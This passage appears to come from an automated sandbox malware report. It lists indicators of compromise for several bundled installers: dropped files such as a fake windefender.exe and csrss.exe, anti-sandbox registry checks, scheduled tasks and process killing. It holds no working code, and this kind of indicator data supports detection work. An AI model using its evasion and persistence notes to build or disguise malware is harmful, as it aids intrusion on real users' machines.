IBInstaller_97039.tmpvpn.tmpchashepro3.tmp3zfg0vwkmou.exevuc5xpml40m.tmpMaskVPNUpdate.exevict.tmpdescription ioc Process File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-DB4SF.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File created C:\Program Files\L7U58PP2FM\L7U58PP2F.exe 3zfg0vwkmou.exe File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-KDJQH.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\JCleaner\is-L1042.tmp chashepro3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-S0NC5.tmp vpn.tmp File created C:\Program Files\L7U58PP2FM\uninstaller.exe 3zfg0vwkmou.exe File created C:\Program Files (x86)\MaskVPN\is-142NE.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\is-CHJSO.tmp vuc5xpml40m.tmp File opened for modification C:\Program Files (x86)\JCleaner\Venita.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\version MaskVPNUpdate.exe File created C:\Program Files (x86)\MaskVPN\is-MIFPD.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\unins000.dat vuc5xpml40m.tmp File created C:\Program Files (x86)\JCleaner\is-OFETQ.tmp chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\is-J6DUC.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-GFKFI.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-ID8U9.tmp vpn.tmp File created C:\Program Files (x86)\JCleaner\is-HQIL6.tmp chashepro3.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-IU9I5.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-4SBL6.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-2RKL6.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-P6FD6.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-LA7BU.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-2PV1D.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vuc5xpml40m.tmp File created C:\Program Files (x86)\JCleaner\is-R4RA2.tmp chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-QESDG.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Abbas.exe chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-O318E.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-BO46G.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-KPBP8.tmp vpn.tmp File created C:\Program Files\L7U58PP2FM\L7U58PP2F.exe.config 3zfg0vwkmou.exe File created C:\Program Files (x86)\JCleaner\is-8HRN2.tmp chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\is-FFL68.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-16KQS.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\5.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-IFM7E.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-HMLK9.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-VNL7Q.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-NNHJD.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-ETAHH.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-PDF6C.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\whiterauf.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-A9FLS.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-OVN3C.tmp IBInstaller_97039.tmp -
Drops file in Windows directory 16 IoCs
Processes:
multitimer.execmd.execsrss.exeMicrosoftEdge.exetapinstall.exeDrvInst.exeapp.exeMicrosoftEdge.exeWerFault.exesvchost.exedescription ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log cmd.exe File opened for modification C:\Windows\inf\oem2.inf cmd.exe File created C:\Windows\inf\oem2.inf cmd.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\rss\csrss.exe app.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\rss app.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 48 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 4820 4752 WerFault.exe 152 4148 4752 WerFault.exe 152 5384 4752 WerFault.exe 152 5540 4752 WerFault.exe 152 5728 4752 WerFault.exe 152 5144 4752 WerFault.exe 152 4836 4752 WerFault.exe 152 4680 4752 WerFault.exe 152 1048 4752 WerFault.exe 152 6068 4568 WerFault.exe 142 1284 3880 WerFault.exe 312 1508 3880 WerFault.exe 312 2312 3880 WerFault.exe 312 5860 3880 WerFault.exe 312 4612 3880 WerFault.exe 312 664 3880 WerFault.exe 312 4440 3880 WerFault.exe 312 4596 3880 WerFault.exe 312 5252 3880 WerFault.exe 312 836 3880 WerFault.exe 312 7044 5800 WerFault.exe 397 6976 5800 WerFault.exe 397 4064 5800 WerFault.exe 397 6564 5800 WerFault.exe 397 6484 5800 WerFault.exe 397 6824 5800 WerFault.exe 397 5660 5800 WerFault.exe 397 6440 5800 WerFault.exe 397 6892 5800 WerFault.exe 397 4504 4144 WerFault.exe 479 7292 4144 WerFault.exe 479 7460 4144 WerFault.exe 479 7704 4144 WerFault.exe 479 7984 4144 WerFault.exe 479 7692 4144 WerFault.exe 479 7840 4144 WerFault.exe 479 8032 4144 WerFault.exe 479 4928 4144 WerFault.exe 479 6228 4144 WerFault.exe 479 8092 8152 WerFault.exe 539 8112 8152 WerFault.exe 539 6412 8152 WerFault.exe 539 5068 8152 WerFault.exe 539 7668 8152 WerFault.exe 539 4384 8152 WerFault.exe 539 6328 8152 WerFault.exe 539 8184 8152 WerFault.exe 539 7336 8152 WerFault.exe 539 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
DrvInst.exesvchost.exeC0CA61A12E4C8B38.exesvchost.exeC0CA61A12E4C8B38.execmd.exetapinstall.exetapinstall.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName C0CA61A12E4C8B38.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 C0CA61A12E4C8B38.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
3E52.tmp.exevisCsLiTc.exei05BjXfG5.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3E52.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3E52.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 visCsLiTc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString visCsLiTc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 i05BjXfG5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString i05BjXfG5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 5236 schtasks.exe 5292 schtasks.exe -
Delays execution with timeout.exe 8 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid Process 5300 timeout.exe 3972 timeout.exe 6392 timeout.exe 6148 timeout.exe 8272 timeout.exe 7288 timeout.exe 4676 timeout.exe 4692 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
multitimer.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 12 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exepid Process 4736 taskkill.exe 7260 taskkill.exe 9224 taskkill.exe 4772 taskkill.exe 10892 taskkill.exe 3768 taskkill.exe 1352 taskkill.exe 1516 taskkill.exe 4824 TASKKILL.exe 9104 taskkill.exe 4556 taskkill.exe 4448 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
csrss.exemask_svc.exewindefender.exeapp.execmd.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time" mask_svc.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-291 = "Central European Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 